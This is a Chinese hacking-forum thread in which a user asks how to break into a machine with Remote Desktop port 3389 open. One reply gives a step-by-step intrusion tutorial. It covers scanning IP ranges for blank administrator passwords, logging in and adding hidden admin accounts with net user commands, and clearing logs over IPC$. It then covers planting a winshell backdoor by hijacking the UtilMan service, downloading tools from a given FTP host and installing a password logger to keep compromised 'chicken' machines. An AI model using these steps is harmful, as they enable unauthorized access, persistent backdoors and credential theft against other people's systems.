|
 | 作者: jacklyc [jacklyc]
 论坛用户 |
登录 |
| 请问一下,我有什么办法进入他的机子. 那台机子已经打了补丁,不能用输入法进去.请问还有什么办法,或软件? |
| 地主 发表时间: 03/06 18:41 |
 | 回复: tonny [tonny888] 论坛用户 |
登录 |
|
猜密码了 |
| B1层 发表时间: 03/06 18:50 |
| 回复: jacklyc [jacklyc] 论坛用户 |
登录 |
|
有什么好的软件猜3389的密码吗? |
| B2层 发表时间: 03/06 18:54 |
 | 回复: haxai [haxai] 论坛用户 |
登录 |
|
发杨黑客的身神,,努力 |
| B3层 发表时间: 03/06 19:25 |
| 回复: mbmzb [mbmzb] 论坛用户 |
登录 |
|
晕---扫弱口令和开3389的直接进 |
| B4层 发表时间: 03/10 13:04 |
 | 回复: playopy [playopy]  论坛用户 |
登录 |
|
3389,不多见啊 |
| B5层 发表时间: 03/10 13:17 |
| 回复: playopy [playopy] 论坛用户 |
登录 |
|
现在有输入法漏洞的机器已不多了,除非你遇见的是一个极不负责任的网管,呵呵!~这篇教程就是教你不用输入法漏洞就能用终端服务连接上开3389的机器,使它成为你的肉鸡。(下面的人要注意啊,不要搞国内的机器,我用来做示范的是台湾的机器,为何要用台湾的呢?等一下就知道啦)先做一下准备活动,呵呵!何为准备活动?就是找到要用的工具呀。(操作系统要求win2000/NT) 一.X-scan-v1.0,强大的扫描工具,简单易用,没有IP限制,呵呵?想到什么了? 二.WIN2000终端服务客户端(没这个怎么叫3389肉鸡呢?) 三.CleanIISLog.exe,榕哥的清日志的好东东!^o^(又买广告呢) 四.SQLEXEC.EXE (以上软件均在本站有下载http://www.sandflee.net) 好!武器都准备好了就动手吧! 一。运行X-scan-v1.0工具包中的xscan_gui.exe,这是一个图形界面的扫描器,在“扫描设置”下选择“标准端口”;“NT弱口令用户”;“SQL-SERVER默认帐户”这三项,“运行参数”下填上你要扫描的IP地址段,例如:211.**.1.1-211.**.20.255(选的范围不要太大,要不很长时间都扫不完,也不要太少,少了可能找不到肉鸡),尽量不要选下面的“使用代理服务器”,线程要看你的网速如何,快的可以填50线程,我一般是用50的!YEAH!~~在“扫描前先PING主机”打上钩,“X-SCANNER所在位置”用默认的.\xscan.exe就可以了。再来“其他设置”下,“配置文件”处是.\dat\config.ini,点击旁边的“读取设置”,看到这个面板的框框都有东西了,就表示设置好!回到开始时的“扫描设置”面板下,点击下方的“开始扫描”。见到一个DOS窗口出来了,扫描正式开始!^O^,去泡泡MM吧,天南地北的吹一通,呵呵,看到扫描全部完成了,和你的MM说拜拜咯,开工~!! 看看扫描的报告,可能会很多的,一定要看清楚哦,要不肉鸡可能就这样给飞走啦。找找看,(主要是找有NT弱口令帐户又同时开了3389的机器)我就找到了一个例子:(不是真的哦,别照这个去试) 211.**.**.53: 【详细资料】 【主机摘要 -- 域名/主机名:"快辣侥" 操作系统:"Windows NT 5.0"】 NT弱口令帐户:1 开放端口:135,139,3389 看到了吗?NT弱口令帐户:1 开放端口:135,139,3389,!!!!!!!!!! 好了,再点“详细资料”进去看看: 【NT弱口令用户】: Administrator: [空口令] 帐户类型:管理员(Administrator) 最后登录时间: GMT 错误口令次数: 0次 成功登录次数: 9次 用户ID: 0x000001f4, 组ID: 0x00000201 欢呼吧,!!!!!!!(如果看到“详细资料”里的帐户类型不是管理员的话,就找下一个吧,反正扫描报告多得很,总会找到一个的,我就试过扫描一次,就扫到了十多个这样的帐户,呵呵!~~) 知道了管理员的帐户是:Administrator,口令是空!到这时候,这台NT主机已差不多可以说是你的啦。 二.运行你的终端服务客户端,填上这个IP,按“连接”,等一下就看到了熟悉的WIN2000终端登陆界面,好,填上用户名:Administrator,口令不用填啦,按“确定”,等一下,哈哈!!!!!进去啦~~~~你会先看到一个叫你设定伺服器的画面,关掉,不要了。想干什么?首先我们为了防止管理员以后改了密码,我们先要给自己做一个管理员的帐户,点对方屏幕的开始--》程序--》附件--》命令提示符(这里的字有时是不同的,要看具体是什么系统,自己好好看看吧),依次输入: C:\>net user owem lgg1234 /add(加入一个用户名为owem,密码:lgg1314的帐户) 指令�绦谐晒Α� C:\>net localgroup administrators owem /add(把owem加入到管理员组) 指令�绦谐晒Α� 好了!到这里你已增加了一个管理员了,以后就算他把Administrator的密码改了你也可以用owem这个帐户进去耍啦,建议你先用net user看看人家的管理组有多少人,人多的话就尽管加个号吧,人少的加号时就要找一个近似于对方的名字来迷惑管理员,哈哈~`够绝了吧! 再来,在自己的命令提示符下依次输入: D:\hacker>net use \\211.**.**.53\ipc$ "lgg1314" /user:"owem"(用IPC管道连接上去) 命令成功完成。 D:\hacker>copy CleanIISLog.exe \\211.**.**.53\c$(把CleanIISLog.exe拷到对方对方C盘下,有时会拒绝访问的,就拷到其他目录下吧) 已复制 1 个文件。 你也可以把木马拷上去,哈哈!~~~有意思!!5555555555..... 再来删除IPC的连接 D:\hacker>net use \\211.**.**.53\ipc$ /delete \\211.**.**.53\ipc$ 已经删除。 先去看看管理员在不在,开始--》程序--》系统管理工具--》终端服务管理员,哈哈!`~没在!爽极啦,只有你一个连线! 下面该玩点什么呢?打开他的浏览器,去你知道的黑软地址下载你想用的工具,什么?装个流光?哈哈!~~`目标太大了吧?还是下个X-SCAN算了,下个IP炸弹??呵呵!好主意,`炸你的情敌去吧!用他下载的X-SCAN帮你去找更多的肉鸡!1YEAH!如果你在上面运行了程序,你退出时就只关终端窗口右上角的X就行了,关掉后你的程序还在运行呢!明天睡醒了来收你的战果吧!如果你要全部退出,就按开始--》关机--》登出****(你的帐户)。 还要补充的就是如果你扫到的是:SQL-SERVER默认帐户,没有NT管理员弱口令,但3389还是开了的话,就可以用SQLEXEC。EXE来连接上去,建立帐户也是用一样的命令,你也可以用3389登陆上去啦。 好!下课!!GOOD LOCK! 建立自己的工作鸡 当你扫到第一台肉鸡后,以后你就不用在自己的pc上扫鸡,连接肉鸡了 这样好处当然多多,最大的好处: 1,肉鸡一般不会关机,24小时为你工作 2,不容易暴露自己的ip,特别对国内机 3,可以非常方便的复制文件到其他肉鸡上 现在就讲讲我是如何建立自己的工作鸡的 1,选肉鸡(当然肉鸡不多的朋友先随便找台用用) 工作鸡一定要网速快(废话!),内存越大越好(我先一般选2g左右内存的做工作鸡)这样扫鸡系统不会慢下来,扫鸡是很耗系统资源的,看他有没有自己的网站(有网站的不选,这种鸡管理员管得多),最后看看他的上网时间显示2天以上的ok,一般100m专线的都是2天以上的 2,安装(所有文件都要安装或放在在x:/recycler或x:/recycled 垃圾桶文件夹) 安装ftp服务器端软件,我一般都用serv-u,图形界面非常容易使用,安装后建立一个anonymous用户,只给他读取权限,匿名访问用。再建立一个你上传用的用户设密码,给他执行以外的所有权限。最后建议在建一个用户目录指向x:/winnt/system32 给他全部权限(以防将来后门被删,到时用这个用户传个木马上去,你又可以控制肉鸡了),端口建议不要用默认的21容易发现。好了把你的所有工具传上去吧。访问: ftp://ip:你的端口!忘了说,最后要到...涂床坏�serv-u了 安装流光,xscan或WINNTAutoAttack任何一个扫描工具,我喜欢WINNTAutoAttack,虽然错误多,但速度快,一个晚上可以扫十几万个ip,肉鸡来的就快啊 安装后门,方法写过了 好了,你的工作鸡建成了,是不是扫鸡的效率高了? 累了!如何隐藏文件,不让别人入侵以后再写 如何把肉鸡占为己有 想要完全的把肉鸡占为己有不太可能,微软产品漏洞不断的出,今天出了这个漏洞明天又有新漏洞! 我只能说一下简单的让菜鸟不能入侵的方法: 1,下载所有微软的补丁,装sp3,等等 2,更改注册表Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous = 1 来禁止139空连接,就扫不到账号了! 3,修改服务器端的终端端口设置,注册表有2个地方需要修改 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp] PortNumber值,默认是3389,修改成所希望的端口,比如1234 第二个地方: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] PortNumber值,默认是3389,修改成所希望的端口,比如1234 现在这样就可以了。重启 这样,即是被扫到了admin组用户名密码,也不能通过终端默认的3389来连接,连接的方法:ip:你设定的端口 4,关掉ipc通道,在管理工具---服务---server这一项,把他设为禁用,并停止他 这样用net命令就连接不上了 5,安装后门,万一被人入侵了或被管理员发现了就可以通过后门进入,建议用winshell,使用方法以前讲过! 安装后门! 虽然获得管理员的帐号,但总有一天会被管理员发现有人入侵,管理员一般会用一下方法防范,修改admin密码,关掉139端口,关掉终端(3389)等等,遇到这样的情况怎么办呢?我们就要装个后门,从后门进去! 现在追常用的是winshell,我也用它 使用方法: 1,到这里 ftp://61.33.5.200:5678 ;下载解压打开,建议关掉杀毒软件,运行winshell.exe,里面有你用的端口,密码等等,改成自己用的,然后做成,我把它做成UtilMen.exe这个 2,把UtilMen.exe放到肉鸡的x:/winnt/system32 3,在注表内改HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UtilMan右边有个ImagePath把它值里面的UtilMan.exe改成UtilMen.exe 4,到管理,服务内Utility Manager找到这个服务改为自动再启动它 5,好了,你可以在你电脑上用telnet IP 端口(你的winshell端口)来连它了 最常用: net user axin axin1234 /add 建了个AXIN的用户,密码是AXIN1234 net localgroup administrators axin /add 把AXIN这个用户提升为管理员 最后建议在下载一个pass.exe,运行他,这个纪录每次admin登陆的密码 密码在c:\winnt\temp\stconfig.ini |
| B6层 发表时间: 03/10 13:18 |
 | 回复: laievf [laievf]  论坛用户 |
登录 |
|
可以用流光猜猜密码啊!~~~1放个好字典 |
| B7层 发表时间: 03/11 07:23 |
 | 回复: vj110 [vj110] 论坛用户 |
登录 |
|
其实3389 很好搞定 用流光或者别的扫描软件 在扫3389端口的同时再破弱口命,, 当扫到3389 打开的3389端口而且有弱口命的同时就会¥##¥・嘿嘿 省下的就自己慢慢爽啦, 哈哈哈 |
| B8层 发表时间: 03/12 11:30 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 我扫到一个3389端口